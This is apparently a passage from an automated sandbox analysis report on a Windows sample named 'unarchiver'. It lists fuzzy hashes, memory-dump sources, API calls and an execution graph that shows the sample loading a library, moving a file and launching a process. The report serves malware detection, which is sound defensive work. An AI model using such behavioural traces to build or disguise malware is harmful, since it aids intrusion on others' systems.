                                                          • Instruction ID: af2c34e411cc66d29281befb4cfaa070fb070ace8b97c452279f6419ba8ad61e
                                                          • Opcode Fuzzy Hash: 2e43fd11792e6f2174f08fc6e1bbbaf0e2b53251b02813ec38761db6bc86a9e7
                                                          • Instruction Fuzzy Hash: 6A218E75500604AFE721CF25DC89F67BBECEF04610F18846AEA4A8B362D374E949CA71

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 176 14fa962-14fa9b9 179 14fa9fd-14faa02 176->179 180 14fa9bb-14fa9c3 WriteFile 176->180 179->180 182 14fa9c9-14fa9db 180->182 183 14fa9dd-14fa9fa 182->183 184 14faa04-14faa09 182->184 184->183
                                                          APIs
                                                          • WriteFile.KERNELBASE(?,00000E24,96B40A86,00000000,00000000,00000000,00000000), ref: 014FA9C1
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: e280fe42eba66c62fa8c9816fa4b33f5656bfd34600aed509af76a33b73cfa19
                                                          • Instruction ID: 93f44c3c7d3ec7d6a3d041e4a3bc542c2dfc588acd39b75199930d22c4a9dc5c
                                                          • Opcode Fuzzy Hash: e280fe42eba66c62fa8c9816fa4b33f5656bfd34600aed509af76a33b73cfa19
                                                          • Instruction Fuzzy Hash: 1E11C475400200AFEB21CF65DD45F67FBE8EF04724F14886AEA498B252D375A548CBB1
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(?,00000E24,96B40A86,00000000,00000000,00000000,00000000), ref: 014FA8DE
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 2d465a2bbef31675bbaf25391279ea3028ebee3ba910ce7f24493a5778f9aecb
                                                          • Instruction ID: 4c2cdd72e9e5a2d3302750b8a3a9bc74b77b901d79753bbbf8984529b610b658
                                                          • Opcode Fuzzy Hash: 2d465a2bbef31675bbaf25391279ea3028ebee3ba910ce7f24493a5778f9aecb
                                                          • Instruction Fuzzy Hash: 3111E371400200AFEB21CF65DD45F67FBE8EF44724F14886BEA498B252D374A5458BB2
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(?), ref: 014FA30C
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: c2d23591b324c5e4bdade4fd03e7b3e8d5574624b4a7e8e9be0eb8efd4b75b9b
                                                          • Instruction ID: 02dc7c0467e9d9704267a56920f8cb89be424a44f42bd9b59b9b5a05bfdbcb8e
                                                          • Opcode Fuzzy Hash: c2d23591b324c5e4bdade4fd03e7b3e8d5574624b4a7e8e9be0eb8efd4b75b9b
                                                          • Instruction Fuzzy Hash: A8115E758097C09FDB228B25DC94A52BFB4DF07224F0984DBD9858F263D275A909CB72
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,?), ref: 014FAA8B
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory
                                                          • String ID:
                                                          • API String ID: 4241100979-0
                                                          • Opcode ID: 01892eeae40cae8dda8cc9d3f60f0a10d8fd57f9450e92128636003afbbd4bc6
                                                          • Instruction ID: af32c275e80cf69f54dfd80ddf05b6cf9d745eab5314a94ccdea02234f31f2a6
                                                          • Opcode Fuzzy Hash: 01892eeae40cae8dda8cc9d3f60f0a10d8fd57f9450e92128636003afbbd4bc6
                                                          • Instruction Fuzzy Hash: CE115271A042409FEB10CF69D985757BBD8EF04610F18C4AEDE09CB352E375D548CA61
                                                          APIs
                                                          • GetFileType.KERNELBASE(?,00000E24,96B40A86,00000000,00000000,00000000,00000000), ref: 014FA815
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID:
                                                          • API String ID: 3081899298-0
                                                          • Opcode ID: b69a9c35991f22287dd9781c3da0915c437f963021ded75235dadb15b5f5363c
                                                          • Instruction ID: 3ce7f731c986786a2ae4089f8f04e81e7ccac489a8d73f728e41af36ea174f00
                                                          • Opcode Fuzzy Hash: b69a9c35991f22287dd9781c3da0915c437f963021ded75235dadb15b5f5363c
                                                          • Instruction Fuzzy Hash: AE01F975504200AEE720CF15DC45BA7FBE8DF04724F14C05BEE498B352D3B8E5458AB6
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CloseFind
                                                          • String ID:
                                                          • API String ID: 1863332320-0
                                                          • Opcode ID: 1df03a43f0c27f05046ca15f9f324e912526a5d02366f6735d3b613cc7e03b0f
                                                          • Instruction ID: 67f81adeee43fbbbd29c82ad9c126ec137216e06b06f777c6833b3e57dfff24e
                                                          • Opcode Fuzzy Hash: 1df03a43f0c27f05046ca15f9f324e912526a5d02366f6735d3b613cc7e03b0f
                                                          • Instruction Fuzzy Hash: 31119EB15093809FDB128F25DC85A52BFF4EF06220F0984DBE9858B263D274A808DB62
                                                          APIs
                                                          • GetSystemInfo.KERNELBASE(?), ref: 014FB208
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: InfoSystem
                                                          • String ID:
                                                          • API String ID: 31276548-0
                                                          • Opcode ID: 8ff697b47ed89f1880afe5ab5b429f950e1eb4cdb1bda3aa1345ccaeb36547bd
                                                          • Instruction ID: 210ede990c9a2202f487e1724cbf941825842db94390a01598771591e98882f7
                                                          • Opcode Fuzzy Hash: 8ff697b47ed89f1880afe5ab5b429f950e1eb4cdb1bda3aa1345ccaeb36547bd
                                                          • Instruction Fuzzy Hash: E6117C754093809FDB12CF25DC88B56BFB4DF46220F0884EBED848F263D275A908CB62
                                                          APIs
                                                          • CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 014FAC36
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CreatePipe
                                                          • String ID:
                                                          • API String ID: 2719314638-0
                                                          • Opcode ID: da685bea4671c17a545187444b3208ed6be89af04667b1d9ad26feb694c43c90
                                                          • Instruction ID: d5d871730aaa529d945fc5867ace8cb28830045e75342dcbe82cae13514f1688
                                                          • Opcode Fuzzy Hash: da685bea4671c17a545187444b3208ed6be89af04667b1d9ad26feb694c43c90
                                                          • Instruction Fuzzy Hash: 8C017172900200ABD310DF26DD86B26FBE8FB88B20F14855AED089B641D735F915CBE5
                                                          APIs
                                                          • FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 014FA1C2
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: FileFindNext
                                                          • String ID:
                                                          • API String ID: 2029273394-0
                                                          • Opcode ID: 24c1dea03a52422a66ffe7dfdf8bb417c74f09027962fa56a593793cc1a35bf5
                                                          • Instruction ID: a5f71d441523566e1f61efede8f38c08c774f23e1182cbdf23199944f1edff9d
                                                          • Opcode Fuzzy Hash: 24c1dea03a52422a66ffe7dfdf8bb417c74f09027962fa56a593793cc1a35bf5
                                                          • Instruction Fuzzy Hash: 31017172900200ABD710DF26DD86B26FBE8EB88A20F14855AED089B641D735F915CBE5
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CloseFind
                                                          • String ID:
                                                          • API String ID: 1863332320-0
                                                          • Opcode ID: 55c024a8a794fc049bdc364754d8e7c9516a83b76636861cca0251abd7362488
                                                          • Instruction ID: 21ca62b0639b5566416d7879427f4774fb56db821c3be88a4804a656a10e8883
                                                          • Opcode Fuzzy Hash: 55c024a8a794fc049bdc364754d8e7c9516a83b76636861cca0251abd7362488
                                                          • Instruction Fuzzy Hash: 9601F4B55002409FDB108F29D885762FBE4EF05220F08C0AFDE098F3A2D379E844DEA2
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(?), ref: 014FA30C
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: f7dfef18f8e499845d224db74846e84c569fb10523d7e6505f8a3405d6d5bcca
                                                          • Instruction ID: 8c6662da8c04cfcec9bb791a152914c2ebdb6794300c35b0fc8851c0104c02b5
                                                          • Opcode Fuzzy Hash: f7dfef18f8e499845d224db74846e84c569fb10523d7e6505f8a3405d6d5bcca
                                                          • Instruction Fuzzy Hash: 35F0AF758042409FEB20DF15D885762FBE0EF04624F18C09ADE094B362D3B9A404CEA2
                                                          APIs
                                                          • CloseHandle.KERNELBASE(?), ref: 014FA748
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: 8ff894508e8bb39714ca2641db1e509f7a14535647a696c29bec02c70e4bf103
                                                          • Instruction ID: bf61db7577e130ae3691c186a492cdcbc901cde0cf290768c8e03f4a2dd46021
                                                          • Opcode Fuzzy Hash: 8ff894508e8bb39714ca2641db1e509f7a14535647a696c29bec02c70e4bf103
                                                          • Instruction Fuzzy Hash: 9521B0B59097C05FDB128B25DC95792BFB4EF02320F1984DBDC858B2A3D2249908C762
                                                          APIs
                                                          • CloseHandle.KERNELBASE(?), ref: 014FA748
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: 703f642edcd8de148cd1af77cd1c589e1bb0025893e98e8117580b369669af88
                                                          • Instruction ID: a60e6b65c3570a638ce7f4eabd4ac3c27386af693dae34353036c86234becf80
                                                          • Opcode Fuzzy Hash: 703f642edcd8de148cd1af77cd1c589e1bb0025893e98e8117580b369669af88
                                                          • Instruction Fuzzy Hash: 44018F759042409FDB10DF29D985B66FBE4DF04720F18C4AFDD0A8B352D379E444CAA2
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c377da7c12b8279114c3857c07489d8cd29cba298882abbfd2b90a2c5c90c3ed
                                                          • Instruction ID: ae00980597437861bde93626c863702fe1e7bbd179f2c806b8ae0d401091917e
                                                          • Opcode Fuzzy Hash: c377da7c12b8279114c3857c07489d8cd29cba298882abbfd2b90a2c5c90c3ed
                                                          • Instruction Fuzzy Hash: 53B16134601110CFD765DB65E858AAF77BAFF8C341F1292A9D906AB364DF349C05CBA0
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4173830914a9108f996c1ca8eac280428d4471ee6fb69232f80de47abd096eb0
                                                          • Instruction ID: c034e9ea8a5861079502669e63339fcb3f3db1d171f5145214e3ffb8e032cbd3
                                                          • Opcode Fuzzy Hash: 4173830914a9108f996c1ca8eac280428d4471ee6fb69232f80de47abd096eb0
                                                          • Instruction Fuzzy Hash: 95A16C70B012008FDB15DBB494597BF77A7FB88309F158069DA16AB3A5DF788C42CBA1
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 235a80df55600bc858e7896f5018d2dfe5ff572b1faef25f7ab93f619bb27087
                                                          • Instruction ID: 5b536ebd689573e6dd5479d412c91ab100794309943cb51b2a8e39d9f7847e77
                                                          • Opcode Fuzzy Hash: 235a80df55600bc858e7896f5018d2dfe5ff572b1faef25f7ab93f619bb27087
                                                          • Instruction Fuzzy Hash: 00213570B006104FC715EB768854AAF7AEBAFCA204B14443DD65ADB392DF79DD0287A2
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 442d08eea08efe3be9352833fe1c62d1c2a0f48eaa8861ae55a014c375ec3b33
                                                          • Instruction ID: e83ddcbd98091c1d81f1f71ac6622c2a2c5025005042586a0b7f4b13dccfb6d4
                                                          • Opcode Fuzzy Hash: 442d08eea08efe3be9352833fe1c62d1c2a0f48eaa8861ae55a014c375ec3b33
                                                          • Instruction Fuzzy Hash: 7F2126707006144BC714EB368854AAFB7E7AFC9204B54883DC15ADB391DF79E9068792
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2b2685ab6e9eeb2b00a3fd8c1340c686147b8537b43fb534a8c35dff939ea34d
                                                          • Instruction ID: ee10dcfe9930d10838e37c63b8aadbdbce6c48a1c12b93187dcf9c8bb4e3ceb8
                                                          • Opcode Fuzzy Hash: 2b2685ab6e9eeb2b00a3fd8c1340c686147b8537b43fb534a8c35dff939ea34d
                                                          • Instruction Fuzzy Hash: BB119D31A10118AFCB04DBB4D8489AF7BF6BF8D214B064175E606E7271EF719C168790
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 399d6abb5c870ed539383f77017cbcc93f955824afa69a739dacfb363ad4d23e
                                                          • Instruction ID: fa36ca129c272b4f32930038ba493b1c9b7b8d2ddb8455cd2523d79ede097df3
                                                          • Opcode Fuzzy Hash: 399d6abb5c870ed539383f77017cbcc93f955824afa69a739dacfb363ad4d23e
                                                          • Instruction Fuzzy Hash: DB114F32A10118AFCB14DBB4D8489AF7BF6FF8D214B064475E606E7275EF719C058791
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1702453473.00000000019B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_19b0000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 187cdfdda61a534279e6e3992bfa9939c5163cb1cbf9db8aa6d7422511a8dc21
                                                          • Instruction ID: 44a1675f7e323eb0445804a2a8809c99f1d4fafbb143416d35d55726ca1c1f92
                                                          • Opcode Fuzzy Hash: 187cdfdda61a534279e6e3992bfa9939c5163cb1cbf9db8aa6d7422511a8dc21
                                                          • Instruction Fuzzy Hash: 9701A2B24092406FD301DF55EC45C57BBFCDF86564F08C4AAFC488B201E225F9188BB2
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1702453473.00000000019B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_19b0000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: af144a8d1bb6e69b7c866e0fff5b315e14edc39b2f53c2163b87dc2e90249490
                                                          • Instruction ID: 1007e59ad5a484ab3d4cbce468ff8adf052110974ef1baf8622ba204584053ea
                                                          • Opcode Fuzzy Hash: af144a8d1bb6e69b7c866e0fff5b315e14edc39b2f53c2163b87dc2e90249490
                                                          • Instruction Fuzzy Hash: 8AF044B65097806FD7118F16AC41863FFE8EE86660709C49FEC498B652D229A908CB76
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1702453473.00000000019B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_19b0000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bfa9106116b9a3dc60d7830eaebe969f3be14b2fbbd090634b1dcf086d16ed50
                                                          • Instruction ID: 0565812e7376b1a4dff3aa422d5a9175c9d1da39d673f6e1c1a04c2edff94083
                                                          • Opcode Fuzzy Hash: bfa9106116b9a3dc60d7830eaebe969f3be14b2fbbd090634b1dcf086d16ed50
                                                          • Instruction Fuzzy Hash: 3FF082B29452046B9200DF55ED46866F7ECDF84561F08C56AEC088B300E276AA154AE2
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a7e6c52442f65661af70db6c25e837f7065b8aafced7835798a373dd1dc57f41
                                                          • Instruction ID: 22cf0668e8574251220101fd4ea06a0d467c8a2570f7e6596f27e6f6e593cec3
                                                          • Opcode Fuzzy Hash: a7e6c52442f65661af70db6c25e837f7065b8aafced7835798a373dd1dc57f41
                                                          • Instruction Fuzzy Hash: 1BE0D831F143141FCB44DBF8585469E7FF6DBC5264B42447AC004D7242EF348C428790
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1702453473.00000000019B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_19b0000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6e2ac5f08fd5e3e3a9d2a85c603df7bafa7221af6b91362ba34def37354f9e7
                                                          • Instruction ID: 8e2102a7bca48531da1df598f0ee7e4a12f70ac7bef6b31169f3617d2d3c8988
                                                          • Opcode Fuzzy Hash: d6e2ac5f08fd5e3e3a9d2a85c603df7bafa7221af6b91362ba34def37354f9e7
                                                          • Instruction Fuzzy Hash: 9BE092B6A046005B9650DF0AEC41462F7D8EB88630708C47FDC0D8B701E639F504CAA5
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 88e43dd15ee76c3c4d6b17776681486d04fc68eb8bf8ca27b8a4c7dd06d329f8
                                                          • Instruction ID: f41d45c1e7b97b96407977493549d3b9ada72c4c1a420410bb6ef6d2bc5432f0
                                                          • Opcode Fuzzy Hash: 88e43dd15ee76c3c4d6b17776681486d04fc68eb8bf8ca27b8a4c7dd06d329f8
                                                          • Instruction Fuzzy Hash: 03D01231F042182B8B48DBB958546AE7BEA9BC4154B564479D109D7341FE359D418790
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4d09551f8777813fa3c56b146b225c75453bf4f19d434dba143ec9c05b066dbf
                                                          • Instruction ID: cb7770bb29f44d1ebb4262b7d736ddac5f703b047af9c8959195481f58a6dfff
                                                          • Opcode Fuzzy Hash: 4d09551f8777813fa3c56b146b225c75453bf4f19d434dba143ec9c05b066dbf
                                                          • Instruction Fuzzy Hash: B6E086301843404FC70587B4981C9E637A96BC1314F4581A684088B262D7A88881C650
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701959677.00000000014F2000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F2000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14f2000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4a862917cef19290a4459cb93a3ec491c3c78588c860b94c5e7b0c801cf39f42
                                                          • Instruction ID: c210e8bc8cfa90f521b1302313e732cae39641e8888ad86bdc652853c022cec9
                                                          • Opcode Fuzzy Hash: 4a862917cef19290a4459cb93a3ec491c3c78588c860b94c5e7b0c801cf39f42
                                                          • Instruction Fuzzy Hash: F7D02EB92006904FE3138E1CC1A4F863BE8AB40704F0A00FEE8008B373C3A8D481C200
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701959677.00000000014F2000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F2000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14f2000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 58688a6043844ea5ef47c50eb36eabd7bbbccb6e31c34b123e3d6b34c6fac5a6
                                                          • Instruction ID: 209af574100c0361cf579216690648a4d1812554d471e39dbaa4bb17f6f46448
                                                          • Opcode Fuzzy Hash: 58688a6043844ea5ef47c50eb36eabd7bbbccb6e31c34b123e3d6b34c6fac5a6
                                                          • Instruction Fuzzy Hash: 18D05E742006814BDB15DE2CC2D4F5A37D8AB40714F1A44EDAD108B372C7B8D8C1CA00
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd97447f0bcf95684925ff9759b5c233b42f705a05d655bdc07fb68ae0b62c24
                                                          • Instruction ID: fc32ba78abfd226ffb38a36aa00e5fce86d0731c5ca737cb466918b74507c54c
                                                          • Opcode Fuzzy Hash: cd97447f0bcf95684925ff9759b5c233b42f705a05d655bdc07fb68ae0b62c24
                                                          • Instruction Fuzzy Hash: 91C012303042048FD704A7B8D81DAA7739A6BC4305F49C0A5850D0B361DEB4EC40C6D0

                                                          Execution Graph

                                                          Execution Coverage

                                                          Dynamic/Packed Code Coverage

                                                          Signature Coverage

                                                          Execution Coverage:1%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:11.7%
                                                          Total number of Nodes:77
                                                          Total number of Limit Nodes:1
                                                          Show Legend
                                                          Hide Nodes/Edges
                                                          execution_graph 6559 73d61605 6560 73d61613 6559->6560 6561 73d6160e 6559->6561 6565 73d614cf 6560->6565 6580 73d61675 6561->6580 6567 73d614db ___scrt_is_nonwritable_in_current_image 6565->6567 6566 73d61504 dllmain_raw 6568 73d614ea 6566->6568 6570 73d6151e dllmain_crt_dispatch 6566->6570 6567->6566 6567->6568 6569 73d614ff 6567->6569 6584 73d61150 6569->6584 6570->6568 6570->6569 6573 73d61570 6573->6568 6574 73d61579 dllmain_crt_dispatch 6573->6574 6574->6568 6576 73d6158c dllmain_raw 6574->6576 6575 73d61150 __DllMainCRTStartup@12 13 API calls 6577 73d61557 6575->6577 6576->6568 6603 73d6141f 6577->6603 6579 73d61565 dllmain_raw 6579->6573 6581 73d6168b 6580->6581 6583 73d61694 6581->6583 6651 73d61628 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6581->6651 6583->6560 6585 73d61166 6584->6585 6586 73d612ba 6584->6586 6626 73d61090 GetSystemDirectoryA 6585->6626 6586->6573 6586->6575 6590 73d6119a 6591 73d612b2 ExitProcess 6590->6591 6592 73d61010 __DllMainCRTStartup@12 __stdio_common_vswprintf 6590->6592 6593 73d611c1 6592->6593 6593->6591 6594 73d61010 __DllMainCRTStartup@12 __stdio_common_vswprintf 6593->6594 6595 73d611e8 6594->6595 6595->6591 6596 73d611f3 GetFileAttributesW 6595->6596 6596->6591 6597 73d6120a MoveFileW 6596->6597 6597->6591 6598 73d61228 6597->6598 6599 73d61010 __DllMainCRTStartup@12 __stdio_common_vswprintf 6598->6599 6600 73d61247 6599->6600 6600->6591 6601 73d6124e memset CreateProcessW 6600->6601 6601->6591 6602 73d6129f CloseHandle CloseHandle 6601->6602 6602->6591 6605 73d6142b ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 6603->6605 6604 73d61434 ___scrt_uninitialize_crt __RTC_Initialize __DllMainCRTStartup@12 6604->6579 6605->6604 6606 73d614c7 6605->6606 6607 73d6145c 6605->6607 6647 73d619d9 IsProcessorFeaturePresent 6606->6647 6640 73d6180a 6607->6640 6610 73d61461 6646 73d616cc __std_type_info_destroy_list 6610->6646 6612 73d61504 dllmain_raw 6614 73d614ea 6612->6614 6616 73d6151e dllmain_crt_dispatch 6612->6616 6613 73d614ce ___scrt_is_nonwritable_in_current_image 6613->6612 6613->6614 6615 73d614ff 6613->6615 6614->6579 6617 73d61150 __DllMainCRTStartup@12 13 API calls 6615->6617 6616->6614 6616->6615 6618 73d6153f 6617->6618 6619 73d61570 6618->6619 6621 73d61150 __DllMainCRTStartup@12 13 API calls 6618->6621 6619->6614 6620 73d61579 dllmain_crt_dispatch 6619->6620 6620->6614 6622 73d6158c dllmain_raw 6620->6622 6623 73d61557 6621->6623 6622->6614 6624 73d6141f __DllMainCRTStartup@12 22 API calls 6623->6624 6625 73d61565 dllmain_raw 6624->6625 6625->6619 6635 73d61050 6626->6635 6628 73d610ca LoadLibraryA 6629 73d610e7 GetProcAddress 6628->6629 6630 73d61105 GetCurrentDirectoryW 6629->6630 6631 73d610fe 6629->6631 6632 73d61010 